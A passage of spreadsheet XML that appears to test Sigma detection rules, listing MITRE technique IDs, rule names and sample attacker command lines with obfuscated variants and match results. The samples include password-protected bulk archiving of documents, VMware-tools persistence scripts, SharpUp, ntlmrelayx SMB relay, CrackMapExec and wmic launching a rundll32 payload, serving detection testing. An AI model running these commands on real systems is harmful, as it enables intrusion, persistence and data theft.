      <c r="H4719" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4719" s="44" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution (bdeeabc9-ff2a-4a51-be59-bb253aac7891); PUA - Wsudo Suspicious Execution (bdeeabc9-ff2a-4a51-be59-bb253aac7891); PUA - Wsudo Suspicious Execution (bdeeabc9-ff2a-4a51-be59-bb253aac7891); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4719" s="44" t="n"/>
      <c r="K4719" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4720" ht="15.75" customHeight="1" s="42">
      <c r="A4720" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4720" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_wsudo_susp_execution</t>
        </is>
      </c>
      <c r="C4720" s="44" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution</t>
        </is>
      </c>
      <c r="D4720" s="44" t="inlineStr">
        <is>
          <t>bdeeabc9-ff2a-4a51-be59-bb253aac7891</t>
        </is>
      </c>
      <c r="E4720" s="44" t="inlineStr">
        <is>
          <t>wsudo --ti</t>
        </is>
      </c>
      <c r="F4720" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4720" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4720" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4720" s="44" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution (bdeeabc9-ff2a-4a51-be59-bb253aac7891); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4720" s="44" t="n"/>
      <c r="K4720" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4721" ht="15.75" customHeight="1" s="42">
      <c r="A4721" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4721" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rar_susp_greedy_compression</t>
        </is>
      </c>
      <c r="C4721" s="44" t="inlineStr">
        <is>
          <t>Suspicious Greedy Compression Using Rar.EXE</t>
        </is>
      </c>
      <c r="D4721" s="44" t="inlineStr">
        <is>
          <t>afe52666-401e-4a02-b4ff-5d128990b8cb</t>
        </is>
      </c>
      <c r="E4721" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rar.exe a -m5 -r -y -ta20210204000000 -hp1qazxcde32ws -v2560k Asia1Dpt-PC-c.rar "c:\\*.doc" "c:\\*.docx" "c:\\*.xls" "c:\\*.xlsx" "c:\\*.pdf" "c:\\*.ppt" "c:\\*.pptx" "c:\\*.jpg" "c:\\*.txt" &gt; nul</t>
        </is>
      </c>
      <c r="F4721" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4721" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4721" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4721" s="44" t="n"/>
      <c r="J4721" s="44" t="n"/>
      <c r="K4721" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4722" ht="15.75" customHeight="1" s="42">
      <c r="A4722" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4722" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rar_susp_greedy_compression</t>
        </is>
      </c>
      <c r="C4722" s="44" t="inlineStr">
        <is>
          <t>Suspicious Greedy Compression Using Rar.EXE</t>
        </is>
      </c>
      <c r="D4722" s="44" t="inlineStr">
        <is>
          <t>afe52666-401e-4a02-b4ff-5d128990b8cb</t>
        </is>
      </c>
      <c r="E4722" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rar.exe -a -m5 -r -y -ta20210204000000 -hp1qazxcde32ws -v2560k Asia1Dpt-PC-c.rar c:\\*.doc c:\\*.docx c:\\*.xls c:\\*.xlsx c:\\*.pdf c:\\*.ppt c:\\*.pptx c:\\*.jpg c:\\*.txt &gt; nul</t>
        </is>
      </c>
      <c r="F4722" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4722" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4722" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4722" s="44" t="n"/>
      <c r="J4722" s="44" t="n"/>
      <c r="K4722" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4723" ht="15.75" customHeight="1" s="42">
      <c r="A4723" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4723" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rar_susp_greedy_compression</t>
        </is>
      </c>
      <c r="C4723" s="44" t="inlineStr">
        <is>
          <t>Suspicious Greedy Compression Using Rar.EXE</t>
        </is>
      </c>
      <c r="D4723" s="44" t="inlineStr">
        <is>
          <t>afe52666-401e-4a02-b4ff-5d128990b8cb</t>
        </is>
      </c>
      <c r="E4723" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rar.exe a -m5 -r -y -ta20210204000000 -hp1qazxcde32ws -v2560k Asia1Dpt-PC-c.rar c:\\*.doc c:\\*.docx c:\\*.xls c:\\*.xlsx c:\\*.pdf c:\\*.ppt c:\\*.pptx c:\\*.jpg c:\\*.txt</t>
        </is>
      </c>
      <c r="F4723" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4723" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4723" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4723" s="44" t="n"/>
      <c r="J4723" s="44" t="n"/>
      <c r="K4723" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4724" ht="15.75" customHeight="1" s="42">
      <c r="A4724" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4724" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vmware_toolbox_cmd_persistence</t>
        </is>
      </c>
      <c r="C4724" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script</t>
        </is>
      </c>
      <c r="D4724" s="44" t="inlineStr">
        <is>
          <t>7aa4e81a-a65c-4e10-9f81-b200eb229d7d</t>
        </is>
      </c>
      <c r="E4724" s="44" t="inlineStr">
        <is>
          <t>VMwareToolBoxCmd.exe script  set  poweron "C:\path\script.bat"</t>
        </is>
      </c>
      <c r="F4724" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4724" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4724" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4724" s="44" t="n"/>
      <c r="J4724" s="44" t="n"/>
      <c r="K4724" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4725" ht="15.75" customHeight="1" s="42">
      <c r="A4725" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4725" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vmware_toolbox_cmd_persistence</t>
        </is>
      </c>
      <c r="C4725" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script</t>
        </is>
      </c>
      <c r="D4725" s="44" t="inlineStr">
        <is>
          <t>7aa4e81a-a65c-4e10-9f81-b200eb229d7d</t>
        </is>
      </c>
      <c r="E4725" s="44" t="inlineStr">
        <is>
          <t>VMwareToolBoxCmd.exe "script" set poweron "C:\path\script.bat"</t>
        </is>
      </c>
      <c r="F4725" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4725" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4725" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4725" s="44" t="n"/>
      <c r="J4725" s="44" t="n"/>
      <c r="K4725" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4726" ht="15.75" customHeight="1" s="42">
      <c r="A4726" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4726" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vmware_toolbox_cmd_persistence</t>
        </is>
      </c>
      <c r="C4726" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script</t>
        </is>
      </c>
      <c r="D4726" s="44" t="inlineStr">
        <is>
          <t>7aa4e81a-a65c-4e10-9f81-b200eb229d7d</t>
        </is>
      </c>
      <c r="E4726" s="44" t="inlineStr">
        <is>
          <t>VMwareToolBoxCmd.exe ^s^c^r^i^p^t set poweron "C:\path\script.bat"</t>
        </is>
      </c>
      <c r="F4726" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4726" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4726" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4726" s="44" t="n"/>
      <c r="J4726" s="44" t="n"/>
      <c r="K4726" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4727" ht="15.75" customHeight="1" s="42">
      <c r="A4727" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4727" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vmware_toolbox_cmd_persistence_susp</t>
        </is>
      </c>
      <c r="C4727" s="44" t="inlineStr">
        <is>
          <t>Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script</t>
        </is>
      </c>
      <c r="D4727" s="44" t="inlineStr">
        <is>
          <t>236d8e89-ed95-4789-a982-36f4643738ba</t>
        </is>
      </c>
      <c r="E4727" s="44" t="inlineStr">
        <is>
          <t>VMwareToolBoxCmd.exe script set poweron C:\Windows\System32\Tasks\..\Tasks\malicious.bat</t>
        </is>
      </c>
      <c r="F4727" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4727" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4727" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4727" s="44" t="n"/>
      <c r="J4727" s="44" t="n"/>
      <c r="K4727" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4728" ht="15.75" customHeight="1" s="42">
      <c r="A4728" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4728" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vmware_toolbox_cmd_persistence_susp</t>
        </is>
      </c>
      <c r="C4728" s="44" t="inlineStr">
        <is>
          <t>Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script</t>
        </is>
      </c>
      <c r="D4728" s="44" t="inlineStr">
        <is>
          <t>236d8e89-ed95-4789-a982-36f4643738ba</t>
        </is>
      </c>
      <c r="E4728" s="44" t="inlineStr">
        <is>
          <t>VMwareToolBoxCmd.exe "script" set poweron C:\Temp\malicious.bat</t>
        </is>
      </c>
      <c r="F4728" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4728" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4728" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4728" s="44" t="n"/>
      <c r="J4728" s="44" t="n"/>
      <c r="K4728" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4729" ht="15.75" customHeight="1" s="42">
      <c r="A4729" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4729" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vmware_toolbox_cmd_persistence_susp</t>
        </is>
      </c>
      <c r="C4729" s="44" t="inlineStr">
        <is>
          <t>Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script</t>
        </is>
      </c>
      <c r="D4729" s="44" t="inlineStr">
        <is>
          <t>236d8e89-ed95-4789-a982-36f4643738ba</t>
        </is>
      </c>
      <c r="E4729" s="44" t="inlineStr">
        <is>
          <t>VMwareToolBoxCmd.exe ^s^c^r^i^p^t set poweron C:\Windows\Temp\malicious.bat</t>
        </is>
      </c>
      <c r="F4729" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4729" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4729" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4729" s="44" t="n"/>
      <c r="J4729" s="44" t="n"/>
      <c r="K4729" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4730" ht="15.75" customHeight="1" s="42">
      <c r="A4730" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4730" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_local_install_via_manifest</t>
        </is>
      </c>
      <c r="C4730" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest</t>
        </is>
      </c>
      <c r="D4730" s="44" t="inlineStr">
        <is>
          <t>313d6012-51a0-4d93-8dfc-de8553239e25</t>
        </is>
      </c>
      <c r="E4730" s="44" t="inlineStr">
        <is>
          <t>winget install --manifest=C:\Temp\test.yaml</t>
        </is>
      </c>
      <c r="F4730" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4730" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4730" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4730" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest (313d6012-51a0-4d93-8dfc-de8553239e25)</t>
        </is>
      </c>
      <c r="J4730" s="44" t="n"/>
      <c r="K4730" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4731" ht="15.75" customHeight="1" s="42">
      <c r="A4731" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4731" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_local_install_via_manifest</t>
        </is>
      </c>
      <c r="C4731" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest</t>
        </is>
      </c>
      <c r="D4731" s="44" t="inlineStr">
        <is>
          <t>313d6012-51a0-4d93-8dfc-de8553239e25</t>
        </is>
      </c>
      <c r="E4731" s="44" t="inlineStr">
        <is>
          <t>winget --manifest C:\Temp\test.yaml install</t>
        </is>
      </c>
      <c r="F4731" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4731" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4731" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4731" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest (313d6012-51a0-4d93-8dfc-de8553239e25)</t>
        </is>
      </c>
      <c r="J4731" s="44" t="n"/>
      <c r="K4731" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4732" ht="15.75" customHeight="1" s="42">
      <c r="A4732" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4732" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_local_install_via_manifest</t>
        </is>
      </c>
      <c r="C4732" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest</t>
        </is>
      </c>
      <c r="D4732" s="44" t="inlineStr">
        <is>
          <t>313d6012-51a0-4d93-8dfc-de8553239e25</t>
        </is>
      </c>
      <c r="E4732" s="44" t="inlineStr">
        <is>
          <t>winget "install" --manifest C:\Temp\test.yaml</t>
        </is>
      </c>
      <c r="F4732" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4732" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4732" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4732" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest (313d6012-51a0-4d93-8dfc-de8553239e25)</t>
        </is>
      </c>
      <c r="J4732" s="44" t="n"/>
      <c r="K4732" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4733" ht="15.75" customHeight="1" s="42">
      <c r="A4733" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4733" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_local_install_via_manifest</t>
        </is>
      </c>
      <c r="C4733" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest</t>
        </is>
      </c>
      <c r="D4733" s="44" t="inlineStr">
        <is>
          <t>313d6012-51a0-4d93-8dfc-de8553239e25</t>
        </is>
      </c>
      <c r="E4733" s="44" t="inlineStr">
        <is>
          <t>winget.exe install -m  C:\Temp\test.yaml</t>
        </is>
      </c>
      <c r="F4733" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4733" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4733" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4733" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest (313d6012-51a0-4d93-8dfc-de8553239e25)</t>
        </is>
      </c>
      <c r="J4733" s="44" t="n"/>
      <c r="K4733" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4734" ht="15.75" customHeight="1" s="42">
      <c r="A4734" s="44" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B4734" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpup</t>
        </is>
      </c>
      <c r="C4734" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpUp PrivEsc Tool Execution</t>
        </is>
      </c>
      <c r="D4734" s="44" t="inlineStr">
        <is>
          <t>c484e533-ee16-4a93-b6ac-f0ea4868b2f1</t>
        </is>
      </c>
      <c r="E4734" s="44" t="inlineStr">
        <is>
          <t>SharpUp.exe Hijackable""Paths</t>
        </is>
      </c>
      <c r="F4734" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4734" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4734" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4734" s="44" t="n"/>
      <c r="J4734" s="44" t="n"/>
      <c r="K4734" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4735" ht="15.75" customHeight="1" s="42">
      <c r="A4735" s="44" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B4735" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpup</t>
        </is>
      </c>
      <c r="C4735" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpUp PrivEsc Tool Execution</t>
        </is>
      </c>
      <c r="D4735" s="44" t="inlineStr">
        <is>
          <t>c484e533-ee16-4a93-b6ac-f0ea4868b2f1</t>
        </is>
      </c>
      <c r="E4735" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c SharpUp.exe Hijackable^Paths</t>
        </is>
      </c>
      <c r="F4735" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4735" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4735" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4735" s="44" t="n"/>
      <c r="J4735" s="44" t="n"/>
      <c r="K4735" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4736" ht="15.75" customHeight="1" s="42">
      <c r="A4736" s="44" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B4736" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpup</t>
        </is>
      </c>
      <c r="C4736" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpUp PrivEsc Tool Execution</t>
        </is>
      </c>
      <c r="D4736" s="44" t="inlineStr">
        <is>
          <t>c484e533-ee16-4a93-b6ac-f0ea4868b2f1</t>
        </is>
      </c>
      <c r="E4736" s="44" t="inlineStr">
        <is>
          <t>SharpUp.exe "Hijackable""Paths"</t>
        </is>
      </c>
      <c r="F4736" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4736" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4736" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4736" s="44" t="n"/>
      <c r="J4736" s="44" t="n"/>
      <c r="K4736" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4737" ht="15.75" customHeight="1" s="42">
      <c r="A4737" s="44" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B4737" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_relay_attacks_tools</t>
        </is>
      </c>
      <c r="C4737" s="44" t="inlineStr">
        <is>
          <t>Potential SMB Relay Attack Tool Execution</t>
        </is>
      </c>
      <c r="D4737" s="44" t="inlineStr">
        <is>
          <t>5589ab4f-a767-433c-961d-c91f3f704db1</t>
        </is>
      </c>
      <c r="E4737" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\jp.exe -t * -p	1337</t>
        </is>
      </c>
      <c r="F4737" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4737" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4737" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4737" s="44" t="n"/>
      <c r="J4737" s="44" t="n"/>
      <c r="K4737" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4738" ht="15.75" customHeight="1" s="42">
      <c r="A4738" s="44" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B4738" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_relay_attacks_tools</t>
        </is>
      </c>
      <c r="C4738" s="44" t="inlineStr">
        <is>
          <t>Potential SMB Relay Attack Tool Execution</t>
        </is>
      </c>
      <c r="D4738" s="44" t="inlineStr">
        <is>
          <t>5589ab4f-a767-433c-961d-c91f3f704db1</t>
        </is>
      </c>
      <c r="E4738" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\jp.exe "-t" * "-p" 1337</t>
        </is>
      </c>
      <c r="F4738" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4738" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4738" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4738" s="44" t="n"/>
      <c r="J4738" s="44" t="n"/>
      <c r="K4738" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4739" ht="15.75" customHeight="1" s="42">
      <c r="A4739" s="44" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B4739" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_relay_attacks_tools</t>
        </is>
      </c>
      <c r="C4739" s="44" t="inlineStr">
        <is>
          <t>Potential SMB Relay Attack Tool Execution</t>
        </is>
      </c>
      <c r="D4739" s="44" t="inlineStr">
        <is>
          <t>5589ab4f-a767-433c-961d-c91f3f704db1</t>
        </is>
      </c>
      <c r="E4739" s="44" t="inlineStr">
        <is>
          <t>python.exe ntlmrelayx.py -t smb://192.0.2.1</t>
        </is>
      </c>
      <c r="F4739" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4739" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4739" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4739" s="44" t="inlineStr">
        <is>
          <t>Potential SMB Relay Attack Tool Execution (5589ab4f-a767-433c-961d-c91f3f704db1); Potential SMB Relay Attack Tool Execution (5589ab4f-a767-433c-961d-c91f3f704db1); Potential SMB Relay Attack Tool Execution (5589ab4f-a767-433c-961d-c91f3f704db1)</t>
        </is>
      </c>
      <c r="J4739" s="44" t="n"/>
      <c r="K4739" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4740" ht="15.75" customHeight="1" s="42">
      <c r="A4740" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4740" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C4740" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D4740" s="44" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E4740" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\crackmapexec.exe	smb	192.0.2.10</t>
        </is>
      </c>
      <c r="F4740" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4740" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4740" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4740" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J4740" s="44" t="n"/>
      <c r="K4740" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4741" ht="15.75" customHeight="1" s="42">
      <c r="A4741" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4741" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C4741" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D4741" s="44" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E4741" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\crackmapexec.exe "smb" 192.0.2.10</t>
        </is>
      </c>
      <c r="F4741" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4741" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4741" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4741" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J4741" s="44" t="n"/>
      <c r="K4741" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4742" ht="15.75" customHeight="1" s="42">
      <c r="A4742" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4742" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C4742" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D4742" s="44" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E4742" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\crackmapexec.exe smb  192.0.2.10</t>
        </is>
      </c>
      <c r="F4742" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4742" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4742" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4742" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J4742" s="44" t="n"/>
      <c r="K4742" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4743" ht="15.75" customHeight="1" s="42">
      <c r="A4743" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4743" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C4743" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D4743" s="44" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E4743" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Tools\crackmapexec.exe sm^b 192.0.2.10</t>
        </is>
      </c>
      <c r="F4743" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4743" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4743" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4743" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J4743" s="44" t="n"/>
      <c r="K4743" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4744" ht="15.75" customHeight="1" s="42">
      <c r="A4744" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4744" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_process_creation</t>
        </is>
      </c>
      <c r="C4744" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4744" s="44" t="inlineStr">
        <is>
          <t>3c89a1e8-0fba-449e-8f1b-8409d6267ec8</t>
        </is>
      </c>
      <c r="E4744" s="44" t="inlineStr">
        <is>
          <t>wmic.exe process  call  create  "rundll32.exe payload.dll,Start"</t>
        </is>
      </c>
      <c r="F4744" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4744" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4744" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4744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744" s="44" t="n"/>
      <c r="K4744" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4745" ht="15.75" customHeight="1" s="42">
      <c r="A4745" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4745" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_process_creation</t>
        </is>
      </c>
      <c r="C4745" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4745" s="44" t="inlineStr">
        <is>
          <t>3c89a1e8-0fba-449e-8f1b-8409d6267ec8</t>
        </is>
      </c>
      <c r="E4745" s="44" t="inlineStr">
        <is>
          <t>wmic.exe "process" "call" "create" "rundll32.exe payload.dll,Start"</t>
        </is>
      </c>
      <c r="F4745" s="44" t="b">
        <v>1</v>
      </c>
